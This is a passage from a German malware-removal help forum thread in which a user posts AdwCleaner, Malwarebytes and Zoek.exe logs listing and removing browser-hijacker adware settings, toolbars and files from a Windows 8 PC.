[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("browser.search.defaultenginename", "yessearches");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("browser.search.defaultenginename.US", "data:text/plain,browser.search.defaultenginename.US=yessearches");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("browser.search.selectedEngine", "yoursearching");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("browser.startup.homepage", "search.mpc.am");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.mywebsearch.prevKwdEnabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.quick_start.enable_search1", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.quick_start.sd.closeWindowWithLastTab_prev_state", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.BUTTON_STRUCTURE", "[{\"b\":224520315,\"c\":\"mindspark.magnify\",\"p\":\"L.0\"},{\"b\":224520316,\"c\":\"mindspark.entersearchterms\",\"p\":\"L.0.0[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.browser.version.last", "43.0");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.firstKnownVersion", "7.38.8.45986");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.homepage", "/index.jhtml?n=7829eb3a");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.hp.enabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.hp.guardType", "HPR");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.initialized", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.installation.installDate", "2016013114");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.installation.success", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lastActivePing", "1454247403235");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lastKnownVersion", "7.38.8.45986");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lssState", "{\"previousLocales\":[\"de\",\"en-US\",\"en\"],\"supportedLocales\":[\"de\",\"es\",\"pt\",\"ja\",\"en\"],\"defaultLocale\":\"en\",\"supp[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.defaultSearch", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.homePageEnabled", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.keywordEnabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.tabEnabled", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.language", "en");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.type", "Toolbar");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.successUrl", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.toolbarCollapsed", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.uninstallTasks", "{\"prefBranchesToDelete\":[\"extensions.toolbar.mindspark._brMembers_.\"],\"filesToDelete\":[\"C:\\\\Users\\\\Manz\\\\AppData\\\\R[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.hp.enabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.hp.enabled.guid", "yourGSearchfinder@GSearch.com");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.lastInstalled", "yourGSearchfinder@GSearch.com");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("keyword.URL", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gefunden : user_pref("browser.newtab.url", "hxxp://www.istartpageing.com/newtab/?type=nt&ts=1454246677&z=dc062b1809293cd4ed326fcg0z2w5z4ofzbq2q8mbq&from=cmi&uid=HitachiXHTS545050A7E380_TA85113VKHP84NKHP84NX");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gefunden : user_pref("browser.search.defaultenginename", "istartpageing");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gefunden : user_pref("browser.startup.homepage", "hxxp://www.istartpageing.com/?type=hp&ts=1454246677&z=dc062b1809293cd4ed326fcg0z2w5z4ofzbq2q8mbq&from=cmi&uid=HitachiXHTS545050A7E380_TA85113VKHP84NKHP84NX");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("browser.newtab.url", "chrome://quick_start/content/index.html");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("browser.search.defaultenginename", "istartpageing");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("browser.search.defaultenginename.US", "data:text/plain,browser.search.defaultenginename.US=yessearches");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("browser.search.selectedEngine", "istartpageing");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("browser.startup.homepage", "hxxp://www.yessearches.com/?ts=AHEpB38oBXYsBE..&v=20160121&uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&mode=ffseng");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.mywebsearch.prevKwdEnabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.quick_start.enable_search1", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.quick_start.sd.closeWindowWithLastTab_prev_state", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.BUTTON_STRUCTURE", "[{\"b\":224520315,\"c\":\"mindspark.magnify\",\"p\":\"L.0\"},{\"b\":224520316,\"c\":\"mindspark.entersearchterms\",\"p\":\"L.0.0[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.browser.version.last", "43.0");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.firstKnownVersion", "7.38.8.45986");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.homepage", "/index.jhtml?n=7829eb40");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.hp.enabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.initialized", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.installation.installDate", "2016013120");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.installation.success", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lastActivePing", "1454267863579");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lastKnownVersion", "7.38.8.45986");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lssState", "{\"previousLocales\":[\"de\",\"en-US\",\"en\"],\"supportedLocales\":[\"de\",\"es\",\"pt\",\"ja\",\"en\"],\"defaultLocale\":\"en\",\"supp[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.defaultSearch", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.homePageEnabled", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.keywordEnabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.tabEnabled", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.language", "en");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.type", "Toolbar");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.successUrl", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.toolbarCollapsed", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.uninstallTasks", "{\"prefBranchesToDelete\":[\"extensions.toolbar.mindspark._brMembers_.\"],\"filesToDelete\":[\"C:\\\\Users\\\\Manz\\\\AppData\\\\R[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.hp.enabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.hp.enabled.guid", "yourGSearchfinder@GSearch.com");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.lastInstalled", "yourGSearchfinder@GSearch.com");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("keyword.URL", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=");
[C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Web data] [Search Provider] Gefunden : palikan
[C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gefunden : booedmolknjekdopkepjjeckmjkdpfgl
[C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gefunden : flpcjncodpafbgdpnkljologafpionhb
[C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gefunden : jlcgehabolcakkjhgmgpkagpolbjlhfa
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [39556 Bytes] ##########
|
|
08.02.2016, 00:40
| #7 |
| | Windows 8.x mit einer großen Auswahl an Schädlingen Anti-Malware Code:
ATTFilter Malwarebytes Anti-Malware www.malwarebytes.org Suchlaufdatum: 07.02.2016 Suchlaufzeit: 22:54 Protokolldatei: malwarebytes.txt Administrator: Ja Version: 2.2.0.1024 Malware-Datenbank: v2016.02.07.04 Rootkit-Datenbank: v2016.01.20.01 Lizenz: Testversion Malware-Schutz: Aktiviert Schutz vor bösartigen Websites: Aktiviert Selbstschutz: Deaktiviert Betriebssystem: Windows 8 CPU: x64 Dateisystem: NTFS Benutzer: Manz Suchlauftyp: Bedrohungssuchlauf Ergebnis: Abgeschlossen Durchsuchte Objekte: 417624 Abgelaufene Zeit: 47 Min., 36 Sek. Speicher: Aktiviert Start: Aktiviert Dateisystem: Aktiviert Archive: Aktiviert Rootkits: Aktiviert Heuristik: Aktiviert PUP: Aktiviert PUM: Aktiviert Prozesse: 0 (keine bösartigen Elemente erkannt) Module: 0 (keine bösartigen Elemente erkannt) Registrierungsschlüssel: 0 (keine bösartigen Elemente erkannt) Registrierungswerte: 0 (keine bösartigen Elemente erkannt) Registrierungsdaten: 0 (keine bösartigen Elemente erkannt) Ordner: 0 (keine bösartigen Elemente erkannt) Dateien: 0 (keine bösartigen Elemente erkannt) Physische Sektoren: 0 (keine bösartigen Elemente erkannt) Code:
ATTFilter Zoek.exe v5.0.0.1 Updated 31-December-2015
Tool run by Manz on 07.02.2016 at 23:50:33,43.
Microsoft Windows 8 6.2.9200 x64
Running in: Normal Mode Internet Access Detected
Launched: E:\zoek.exe [Scan all users] [Script inserted]
==== System Restore Info ======================
07.02.2016 23:52:11 Zoek.exe System Restore Point Created Successfully.
==== Empty Folders Check ======================
C:\PROGRA~2\Pro PC Cleaner deleted successfully
C:\Users\Manz\AppData\Local\3810282D-6C19-47B0-8283-5C6C29A7E108 deleted successfully
C:\Users\Manz\AppData\Local\F727A298-4DB4-456A-AC54-A93EA5F8554D deleted successfully
C:\Users\Manz\AppData\Local\VirtualStore deleted successfully
==== Deleting CLSID Registry Keys ======================
HKEY_CLASSES_ROOT\CLSID\{8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} deleted successfully
==== Deleting CLSID Registry Values ======================
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar\{C424171E-592A-415a-9EB1-DFD6D95D3530} deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\{C424171E-592A-415a-9EB1-DFD6D95D3530} deleted successfully
==== Deleting Services ======================
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LavasoftTcpService deleted successfully
==== FireFox Fix ======================
Deleted from C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js:
user_pref("browser.search.useDBForOrder", true);
Added to C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
Deleted from C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js:
Added to C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
Deleted from C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js:
user_pref("browser.search.useDBForOrder", true);
Added to C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
Deleted from C:\Users\Manz\AppData\Roaming\Thunderbird\Profiles\ryn5yw3e.default\prefs.js:
Added to C:\Users\Manz\AppData\Roaming\Thunderbird\Profiles\ryn5yw3e.default\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
ProfilePath: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
user.js not found
---- Lines yahoo removed from prefs.js ----
user_pref("extensions.xpiState", "{\"app-profile\":{\"@E9438230-A7DF-4D1F-8F2D-CA1D0F0F7924\":{\"d\":\"C:\\\\Users\\\\Manz\\\\AppData\\\\Roaming\\\\Mo
---- Lines yahoo modified from prefs.js ----
user_pref("extensions.enabledAddons", "%7B22DF9C7E-CA9A-482A-BE82-65A20091954C%7D:2.2.15,deskCutv2%40gmail.com:0.1.13,yahooprotected%40gmail.com:1.0.1
---- Lines search.mpc.am removed from prefs.js ----
user_pref("browser.search.searchengine.url", "hxxp://search.mpc.am?q={searchTerms}&cx=partner-pub-3796753109442372:3837783968");
---- Lines searchengine removed from prefs.js ----
user_pref("browser.search.searchengine.alias", "");
user_pref("browser.search.searchengine.desc", "this is my first firefox searchEngine");
user_pref("browser.search.searchengine.hp", "hxxp://www.yessearches.com/?ts=AHEpB38oBXYsBE..&v=20160121&uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1
user_pref("browser.search.searchengine.ptid", "brd");
user_pref("browser.search.searchengine.ref", "");
user_pref("browser.search.searchengine.sp", "hxxp://www.yessearches.com/chrome.php?mode=ffsengext&ptid=sqr1&q={searchTerms}&ts=AHEpB38oBXYsBE..&uid=3D
user_pref("browser.search.searchengine.ts", "");
user_pref("browser.search.searchengine.type", "");
user_pref("browser.search.searchengine.uid", "");
---- Lines searches removed from prefs.js ----
user_pref("browser.urlbar.suggest.searches", true);
---- FireFox user.js and prefs.js backups ----
prefs__0006_.backup
ProfilePath: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default
user.js not found
---- Lines yahoo removed from prefs.js ----
user_pref("extensions.xpiState", "{\"app-profile\":{\"\":{\"d\":\"C:\\\\Users\\\\Manz\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\6kib2
---- Lines searchengine removed from prefs.js ----
user_pref("browser.search.searchengine.alias", "");
user_pref("browser.search.searchengine.desc", "this is my first firefox searchEngine");
user_pref("browser.search.searchengine.iconURL", "hxxp://.com/favicon.ico");
user_pref("browser.search.searchengine.name", "");
user_pref("browser.search.searchengine.ptid", "cmi");
user_pref("browser.search.searchengine.uid", "HitachiXHTS545050A7E380_TA85113VKHP84NKHP84NX");
user_pref("browser.search.searchengine.url", "hxxp://.com/web?type=ds&ts=1454246677&z=dc062b1809293cd4ed326fcg0z2w5z4ofzbq2q8mbq&from=cmi&uid=HitachiX
---- Lines searches removed from prefs.js ----
user_pref("browser.urlbar.suggest.searches", true);
---- FireFox user.js and prefs.js backups ----
prefs__0006_.backup
ProfilePath: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F
user.js not found
---- Lines yahoo removed from prefs.js ----
user_pref("extensions.xpiState", "{\"app-profile\":{\"\":{\"d\":\"C:\\\\Users\\\\Manz\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\CCACC
---- Lines yahoo modified from prefs.js ----
user_pref("extensions.enabledAddons", "deskCutv2%40gmail.com:0.1.13,yahooprotected%40gmail.com:1.0.1.1042,%7B63D7461E-C5DF-4012-87F0-A52D95FE9EC3%7D:2
---- Lines searchengine removed from prefs.js ----
user_pref("browser.search.searchengine.alias", "");
user_pref("browser.search.searchengine.desc", "this is my first firefox searchEngine");
user_pref("browser.search.searchengine.hp", "hxxp://www.yessearches.com/?ts=AHEpB38oBXYsBE..&v=20160121&uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1
user_pref("browser.search.searchengine.iconURL", "hxxp://.com/favicon.ico");
user_pref("browser.search.searchengine.name", "");
user_pref("browser.search.searchengine.ptid", "cmi");
user_pref("browser.search.searchengine.sp", "hxxp://www.yessearches.com/chrome.php?mode=ffsengext&ptid=sqr1&q={searchTerms}&ts=AHEpB38oBXYsBE..&uid=3D
user_pref("browser.search.searchengine.uid", "HitachiXHTS545050A7E380_TA85113VKHP84NKHP84NX");
user_pref("browser.search.searchengine.url", "hxxp://www.yessearches.com/chrome.php?mode=ffsengext&ptid=sqr1&q={searchTerms}&ts=AHEpB38oBXYsBE..&uid=3
---- Lines searches removed from prefs.js ----
user_pref("browser.urlbar.suggest.searches", true);
---- FireFox user.js and prefs.js backups ----
prefs__0006_.backup
ProfilePath: C:\Users\Manz\AppData\Roaming\Thunderbird\Profiles\ryn5yw3e.default
user.js not found
---- FireFox user.js and prefs.js backups ----
prefs__0006_.backup
==== Batch Command(s) Run By Tool======================
Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.
==== Deleting Files \ Folders ======================
C:\PROGRA~2\Pro PC Cleaner not found
C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\yahooprotected@gmail.com not found
C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\yahooprotected@gmail.com not found
C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\yahooprotected@gmail.com not found
C:\windows\SysNative\Tasks\Builder Touch2 deleted
C:\PROGRA~2\Lavasoft\Web Companion deleted
C:\Users\Manz\AppData\Roaming\WB.CFG deleted
C:\Users\Manz\AppData\Roaming\dlg deleted
C:\PROGRA~3\Lavasoft\Web Companion deleted
C:\Users\Manz\AppData\Local\{8396B5CA-A73E-D972-CAA6-FC9AEECE0002} deleted
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\LavasoftTcpService deleted
C:\Users\Public\Documents\dmp deleted
C:\Users\Manz\AppData\LocalLow\Unity deleted
C:\Users\Manz\AppData\LocalLow\Company deleted
C:\Users\Manz\AppData\LocalLow\microsoft\silverlight\outofbrowser\index\portal.qtrax.com deleted
C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\jetpack deleted
C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\jetpack deleted
C:\Users\Manz\Desktop\Amazon.lnk deleted
C:\Users\Manz\Desktop\Hotmail.lnk deleted
C:\Users\Manz\Desktop\Wikipedia.lnk deleted
C:\Users\Manz\Desktop\Continue GUPlayer.lnk deleted
C:\Users\Manz\Desktop\Continue Last version Installation.lnk deleted
C:\Users\Manz\setup.exe deleted
"C:\Windows\Installer\9ddfc.msi" deleted
"C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\websearches.sqlite" deleted
"C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\websearches.sqlite" deleted
"C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\websearches.sqlite" deleted
"C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\websearches.sqlite" deleted
"C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\websearches.sqlite" deleted
"C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\websearches.sqlite" deleted
"C:\PROGRA~2\MPC Cleaner\AdbWinApi.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\AdbWinUsbApi.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\AndriodServer.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\BrowserPlugIn.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\Cleaner.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\Database.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\LogReport.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\LpcManager.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\Monitor.dll" not deleted
